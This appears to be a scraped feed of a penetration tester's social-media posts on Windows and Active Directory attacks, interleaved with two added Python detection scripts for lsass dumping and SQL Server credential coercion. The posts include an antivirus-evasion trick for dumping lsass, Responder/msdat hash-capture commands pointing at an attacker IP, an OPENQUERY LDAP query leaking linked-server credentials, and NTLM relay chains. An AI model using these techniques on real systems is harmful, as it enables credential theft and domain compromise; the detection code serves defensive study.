Spooler service disabled, RPC filters installed to prevent PetitPotam, and File Server VSS Agent Service not installed, but you still want to relay DC authentication to ADCS?
Don't worry, MS-DFSNM has your back ;)
One funny way to use procdump to dump lsass and not get flagged by Defender is to redirect it to an SMB share where only the current user can authenticate (you can use a dummy user with runas /netonly). Defender will not be able to scan the dump file and will not flag it.
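The trick above works because the dump never lands on a disk Defender can read; the access to lsass itself is still visible on the host. As an added example (not code from the original post), the Python below correlates Sysmon-style events to flag a process that opens lsass with a dump-capable access mask and, within a short window, either connects to port 445 or creates a file on a UNC path. The event records, GUIDs, paths and addresses are constructed for illustration; field names follow Sysmon's schema for Event ID 10 (ProcessAccess), 3 (NetworkConnect) and 11 (FileCreate).

```python
"""Flag lsass memory-dump activity whose output leaves the host over SMB.

Added example, not code from the original post. Events are constructed to
resemble Sysmon Event ID 10, 3 and 11 records; the values are made up.
"""
from datetime import datetime, timedelta

# Access masks typically requested when a process opens lsass to dump it
# (0x1FFFFF = PROCESS_ALL_ACCESS; 0x1010 / 0x1410 = VM_READ plus query rights).
SUSPICIOUS_LSASS_ACCESS = {0x1FFFFF, 0x1F3FFF, 0x1010, 0x1410, 0x1438}
WINDOW = timedelta(seconds=120)


def _t(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 10, "UtcTime": _t("2024-01-15 10:00:01"), "SourceProcessGUID": "{A}",
     "SourceImage": r"C:\tools\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 3, "UtcTime": _t("2024-01-15 10:00:02"), "ProcessGuid": "{A}",
     "Image": r"C:\tools\procdump64.exe", "DestinationIp": "10.0.0.5", "DestinationPort": 445},
    {"EventID": 11, "UtcTime": _t("2024-01-15 10:00:03"), "ProcessGuid": "{A}",
     "Image": r"C:\tools\procdump64.exe", "TargetFilename": r"\\10.0.0.5\drop\lsass.dmp"},
    # Defender's own engine touches lsass with a limited mask: benign.
    {"EventID": 10, "UtcTime": _t("2024-01-15 10:00:04"), "SourceProcessGUID": "{B}",
     "SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    # Full-access open, but the dump stays local: worth a look, not "remote".
    {"EventID": 10, "UtcTime": _t("2024-01-15 10:05:00"), "SourceProcessGUID": "{C}",
     "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 11, "UtcTime": _t("2024-01-15 10:05:01"), "ProcessGuid": "{C}",
     "Image": r"C:\Windows\System32\taskmgr.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\lsass.DMP"},
]


def _guid(ev):
    # Event 10 names the opener SourceProcessGUID; events 3 and 11 use ProcessGuid.
    return ev.get("SourceProcessGUID") or ev.get("ProcessGuid")


def _image(ev):
    return ev.get("SourceImage") or ev.get("Image")


def find_lsass_dumps(events):
    """Return one finding per suspicious lsass open, with any evidence that the
    dump left the host over SMB within WINDOW of the open."""
    findings = []
    for ev in events:
        if ev["EventID"] != 10 or not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
            continue
        if int(ev["GrantedAccess"], 16) not in SUSPICIOUS_LSASS_ACCESS:
            continue
        guid, t0 = _guid(ev), ev["UtcTime"]
        remote = []
        for other in events:
            if _guid(other) != guid or not (t0 <= other["UtcTime"] <= t0 + WINDOW):
                continue
            if other["EventID"] == 3 and other.get("DestinationPort") == 445:
                remote.append("smb:" + other["DestinationIp"])
            if other["EventID"] == 11 and other["TargetFilename"].startswith("\\\\"):
                remote.append("unc:" + other["TargetFilename"])
        findings.append({"guid": guid, "image": _image(ev),
                         "severity": "high" if remote else "medium",
                         "remote_evidence": remote})
    return findings


if __name__ == "__main__":
    for f in find_lsass_dumps(SAMPLE_EVENTS):
        print(f)
```

The lsass open alone is enough to raise a medium finding; the SMB connection or UNC file write from the same process GUID is what escalates it, regardless of whether the share is scannable by the host's AV.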
So MSRC first said that they cannot reproduce, now they say that no security boundary is crossed. Tested this on a few different machines and it was successful on all of them.
This is a bug in GamingServices, a non-default service, so the impact is not high.
One of the paths to DA in the current engagement.
Ran gowitness and took screenshots of servers in scope.
Identified Cisco Unified Call Manager on one of the servers. Used SeeYouCM Thief to enumerate AD users.
Used kerbrute to spray passwords and got one hit. 1/n
I published my PoC for CVE-2023-36047 as MSRC fixed the bypass today, tracked as CVE-2024-21447. With some modification it can be ported to CVE-2024-21447.
First CVE in 2024 :)
This was an arbitrary file DACL reset vulnerability with a little twist, and that's that file permissions were copied from the parent folder, which prevented me from using the usual suspects (PrintConfig.dll etc.) during the exploitation.
Have valid creds for an MSSQL DB and xp_dirtree is enabled?
Use msdat and Responder to capture NetNTLM hashes
1: responder -I eth0 -v
2: ./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name $SHARE
#infosec
#hacking
Here is small code to dump the SAM/SYSTEM/SECURITY hives from a remote host when you have SeBackup/SeRestore privileges (Backup Operators): . Files will be saved on the remote host, but Backup Operators can access c$ and download them.
I reported a bypass for a lame patch in Sysmon.
MSRC confirms the bypass; they release a new Sysmon version that apparently fixes the bug.
And this is the response I got for asking if they will give a CVE, as I didn't get any notification from them that they fixed the bug.
Here is my PoC for CVE-2023-20178, an arbitrary file delete vulnerability in Cisco Secure Client and Cisco AnyConnect, which was fixed earlier this month.
TIL: If you have GenericAll rights on an AD container, in this case Program Data (I assume it works on others too), you can add new computer/user objects even if you are not DA / SeMachineAccountPrivilege is disabled.
For those interested in details about the Sysmon vulnerability, at the moment I cannot share any details, as the fix implemented by MSRC is pretty lazy and the vulnerability still exists, and MSRC has been notified about the bypass.
Can trigger authentication on a DC without credentials with PetitPotam, but there is no ADCS? Relay to SMB on other hosts with the socks option in ntlmrelayx and use PrintNightmare through the relayed connection and trigger it without having any credentials 🙃
ESET fixed a vulnerability I found a couple of months ago. This was an arbitrary folder content delete bug, which I was able to turn into an arbitrary file move and gain a SYSTEM shell.
Looks like Microsoft killed the abuse of arbitrary folder creation using the SxS assembly trick. Tested wermgr.exe/narrator.exe/werfault.exe and some of my own that were not public, and they will not try to open the .local directory on fully updated Win10/Win11. :(
I was able to leak the credentials of the user configured for a linked server using the following query:
SELECT * FROM OPENQUERY(linkedserver, 'SELECT sAMAccountName FROM ''LDAP://<kali ip>/DC=somedomain,DC=local'''). 3/n
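Both the xp_dirtree capture earlier on this page and the OPENQUERY above share one property a defender can key on: a T-SQL statement makes the SQL Server authenticate outbound to a host chosen by whoever wrote the query. As an added example (not code from the original thread), the Python below scans statement text for UNC paths and LDAP:// binds that point at hosts outside an allow-list. The statements, the linked server name ADSI, the trusted-host set and the 10.10.14.3 address are all constructed; in practice the statement text would come from SQL Audit or an Extended Events session capturing sql_batch_completed / rpc_completed.

```python
"""Scan T-SQL statements for constructs that make SQL Server authenticate to
an arbitrary host (UNC paths to xp_dirtree and friends, ADSI/LDAP OPENQUERY
against a chosen server).

Added example, not code from the original thread; all sample data is constructed.
"""
import re

# Hosts the SQL Server is expected to talk to (domain controllers, backup
# target). Constructed for this example.
TRUSTED_HOSTS = {"dc01.somedomain.local", "backup01.somedomain.local"}

# \\host\share -> captures host. In T-SQL text the UNC has single backslashes.
UNC_RE = re.compile(r"\\\\([\w.-]+)\\")
# LDAP://host/... -> captures host (serverless 'LDAP://DC=...' has no host part).
LDAP_RE = re.compile(r"LDAP://([\w.-]+)/", re.IGNORECASE)
# Extended procedures that take a path and will authenticate to a UNC target.
COERCION_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")


def classify(statement, trusted_hosts=TRUSTED_HOSTS):
    """Return a finding dict if `statement` would send auth to an untrusted host, else None."""
    lowered = statement.lower()
    for host in UNC_RE.findall(statement):
        if host.lower() not in trusted_hosts:
            proc = next((p for p in COERCION_PROCS if p in lowered), None)
            return {"kind": "unc", "host": host,
                    "reason": f"UNC path to untrusted host via {proc or 'unknown construct'}",
                    "statement": statement}
    for host in LDAP_RE.findall(statement):
        if host.lower() not in trusted_hosts:
            return {"kind": "ldap", "host": host,
                    "reason": "OPENQUERY/ADSI bind to untrusted LDAP server "
                              "(linked-server credential is sent to that host)",
                    "statement": statement}
    return None


def scan_statements(statements, trusted_hosts=TRUSTED_HOSTS):
    """Classify every statement and keep only the findings, in input order."""
    return [f for f in (classify(s, trusted_hosts) for s in statements) if f]


# Constructed sample statements (not captured from a real server).
SAMPLE_STATEMENTS = [
    r"EXEC master..xp_dirtree '\\10.10.14.3\share', 1, 1",
    r"EXEC master..xp_dirtree 'C:\inetpub\wwwroot', 1, 1",
    "SELECT * FROM OPENQUERY(ADSI, 'SELECT sAMAccountName FROM "
    "''LDAP://10.10.14.3/DC=somedomain,DC=local''')",
    "SELECT * FROM OPENQUERY(ADSI, 'SELECT sAMAccountName FROM "
    "''LDAP://dc01.somedomain.local/DC=somedomain,DC=local''')",
    r"BACKUP DATABASE hr TO DISK = '\\backup01.somedomain.local\sqlbak\hr.bak'",
]


if __name__ == "__main__":
    for finding in scan_statements(SAMPLE_STATEMENTS):
        print(finding["kind"], finding["host"], "-", finding["reason"])
```

The LDAP rule is the one that covers the query in this thread: the linked server's stored login is presented to whatever answers at the LDAP:// host, so any host outside the domain controller set is a credential-disclosure event, not just a strange query. Pair the detection with egress filtering of 445/389 from SQL hosts and with linked-server logins mapped per user rather than a single stored account.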
Congratulations to our MSRC 2023 Most Valuable Researchers! Thank you to all the researchers who have helped secure our customers. 👏🎉
Check out our blog for the full list:
Anyone have an idea why it's possible to relay to yourself when using KrbRelay? I am on a DC and relayed auth to the same DC on the LDAP service. This should not work, right? Or is relay to the same host only restricted for NTLM?
@DebugPrivilege
Compromised a user that could set RBCD on a DC, but all domain admins were in the Protected Users group, so I impersonated the DC itself and did a DCSync :)
Me: submit a report with a PoC and a PoC video of how to do everything.
Triage: (does the opposite of what I showed in the video) Can't reproduce
FFS, how do these people get their jobs?
Congratulations to all the researchers recognized in this quarter’s MSRC 2023 Q2 Security Researcher Leaderboard!
For more information, check out our blog post:
#cybersecurity
#securityresearch
#msrc
Feels good to be able to bench more (slightly more) than my current body weight 😊. The last time I was able to do that was almost 4 years ago. Now it's time to chase old PBs and set some new ones!
Used the obtained credentials to try to authenticate on the available MSSQL servers. Got a few successful logins.
On one of the SQL servers there were a few linked servers configured; a few of them were using the ADSDSOObject provider (for integration with AD). 2/n